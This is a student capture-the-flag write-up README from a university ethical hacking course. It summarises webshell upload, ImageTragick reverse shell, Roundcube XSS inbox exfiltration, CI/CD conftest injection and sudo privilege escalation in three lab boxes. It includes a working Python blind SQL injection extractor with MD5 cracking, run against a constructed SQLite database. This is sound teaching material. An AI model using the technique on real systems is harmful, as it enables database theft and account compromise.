## https://sploitus.com/exploit?id=89FA941F-CED4-58DE-AA9E-1DF4276CA136
# Ethical Hacking CTF Writeup
### Coventry University - 7072SCN Ethical Hacking and Penetration Testing
> A 3-box CTF assessment covering web exploitation, CVE research, CI/CD abuse, and privilege escalation. All flags captured.
---
## Overview
| Assessment | User Flag | Root Flag | Key Technique |
|------------|-----------|-----------|---------------|
| Web + SQLi + File Upload | ✓ | ✓ | SQL Injection + File Upload Bypass + sudo ftp |
| Blind SQLi + ImageTragick | ✓ | ✓ | Blind SQLi + CVE-2016-3714 + sudo convert |
| XSS + CI/CD + sudo git | ✓ | ✓ | CVE-2024-42008 XSS Email Exfiltration + CI/CD Injection + sudo git |
---
## Skills Demonstrated
- **Web Exploitation**: SQL injection, XSS, file upload bypass, MIME type manipulation
- **CVE Research & Exploitation**: CVE-2024-42008 (Roundcube XSS), CVE-2016-3714 (ImageTragick)
- **Network Reconnaissance**: nmap, Gobuster, virtual host enumeration
- **Privilege Escalation**: sudo misconfigurations, SUID binaries, GTFOBins
- **CI/CD Exploitation**: pytest conftest.py injection, git hook abuse
- **Scripting**: Custom Python exploit development (smtplib, HTTP listener)
- **Proxy/Interception**: Burp Suite request manipulation
---
## Tools Used
| Tool | Purpose |
|------|---------|
| nmap | Port scanning and service enumeration |
| Gobuster | Directory and virtual host discovery |
| Burp Suite | HTTP request interception and manipulation |
| Python 3 | Custom exploit scripting |
| Netcat | Listeners and shell handling |
| GTFOBins | Sudo escape techniques |
| SSH | Remote access |
| curl | API interaction and webhook triggering |
---
## Structure
```
ethical-hacking-ctf/
├── README.md             - You are here
├── report.docx           - Full penetration test report
├── sqli-file-upload/
│   └── writeup.md        - SQLi + file upload methodology
└── xss-cicd-privesc/
    ├── writeup.md        - Full XSS + CI/CD + privesc writeup
    ├── xss_payload.py    - CVE-2024-42008 exploit script
    ├── conftest.py       - CI/CD injection payload
    └── pre-commit        - Git hook payload
```
---
## Assessment Summaries
### SQLi + File Upload
Enumerated a PHP web application using nmap and Gobuster. Identified SQL injection on the login page and bypassed authentication. Uploaded a PHP webshell disguised as a JPEG using Burp Suite to intercept and manipulate the MIME type. Renamed the file via the admin panel and achieved RCE. Escalated to root via a `sudo ftp` escape using GTFOBins.
### Blind SQLi + ImageTragick (CVE-2016-3714)
Exploited boolean-based blind SQL injection to extract credentials from the database. Cracked the MD5 hash and reused credentials over SSH to get the user flag. Exploited CVE-2016-3714 (ImageTragick) via the avatar upload function to get a reverse shell as www-data. Escalated to root using `sudo convert` with URL injection.
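Boolean-based blind extraction works by turning a page that only says "found" or "not found" into a yes/no oracle and asking it about one character of the target value at a time. The following is an added example, not the script used in the assessment: an in-memory SQLite database stands in for the lab backend, the `users` table, the account and the password are constructed here, and SQLite's `UNICODE()`/`SUBSTR()` play the role of MySQL's `ORD()`/`SUBSTRING()`. The vulnerable query concatenates an `id` parameter; the attacker appends a condition, binary-searches each character over printable ASCII (about seven requests per character), and then checks the recovered MD5 against a small constructed wordlist.

```python
# Added example (not from the writeup): boolean-based blind SQL injection against a
# constructed SQLite stand-in, followed by a wordlist check of the recovered MD5.
import hashlib
import sqlite3

PLANTED_PASSWORD = "Secret123"                                  # constructed
PLANTED_HASH = hashlib.md5(PLANTED_PASSWORD.encode()).hexdigest()
WORDLIST = ["password", "letmein", "Secret123", "admin"]        # constructed


def build_db() -> sqlite3.Connection:
    """Constructed target: one user whose password is stored as an unsalted MD5."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("alice", PLANTED_HASH))
    return conn


def profile_exists(conn: sqlite3.Connection, user_id: str) -> bool:
    """The vulnerable endpoint: `id` is concatenated into the WHERE clause.
    The page reveals only whether a row came back, which is all a blind attack needs."""
    sql = f"SELECT username FROM users WHERE id = {user_id}"     # injectable on purpose
    return conn.execute(sql).fetchone() is not None


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Ask one yes/no question by AND-ing it onto a known-existing row (id = 1)."""
    return profile_exists(conn, f"1 AND ({condition})")


def extract(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` through the boolean oracle:
    first its length, then each character by binary search over 0x20..0x7e."""
    length = next((n for n in range(1, max_len + 1)
                   if oracle(conn, f"LENGTH(({subquery})) = {n}")), 0)
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"UNICODE(SUBSTR(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def crack_md5(digest: str, wordlist):
    """Offline dictionary check of an unsalted MD5; None if no word matches."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def demo() -> dict:
    conn = build_db()
    stolen = extract(conn, "SELECT password FROM users WHERE username = 'alice'")
    return {"hash": stolen, "password": crack_md5(stolen, WORDLIST)}


if __name__ == "__main__":
    result = demo()
    print("extracted hash :", result["hash"])
    print("cracked        :", result["password"])
```

Against a real target each `oracle()` call is one HTTP request, so the per-character binary search (rather than trying all 95 printable characters) is what keeps a 32-character hash down to a few hundred requests. The defence is the one the extraction depends on not being there: parameterised queries, as in the `INSERT` in `build_db()`, and salted password hashing so that a recovered hash is not trivially reversible.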
### XSS Email Exfiltration + CI/CD Injection (CVE-2024-42008)
See [`xss-cicd-privesc/writeup.md`](xss-cicd-privesc/writeup.md) for the full walkthrough.
**TL;DR:** Exploited CVE-2024-42008 XSS in Roundcube Webmail 1.6.6 to silently exfiltrate the webmaster's inbox and steal SSH credentials. Escalated from webmaster → admin by injecting a malicious pytest conftest.py into the CI/CD pipeline via a world-writable /tmp directory. Escalated from admin → root by abusing a NOPASSWD sudo rule for `git commit`, using a malicious pre-commit hook to read the root flag.
---
## Report
The full penetration test report (including reconnaissance, risk ratings using CVSS v3.1, exploit methodology, and mitigations) is available as [`report.docx`](report.docx).
---
## Disclaimer
This assessment was conducted in an authorised academic lab environment as part of Coventry University coursework. All techniques were used only within the designated lab. Do not use these techniques on systems you do not own or have explicit permission to test.
---
*MSc Ethical Hacking and Penetration Testing - Coventry University, 2026*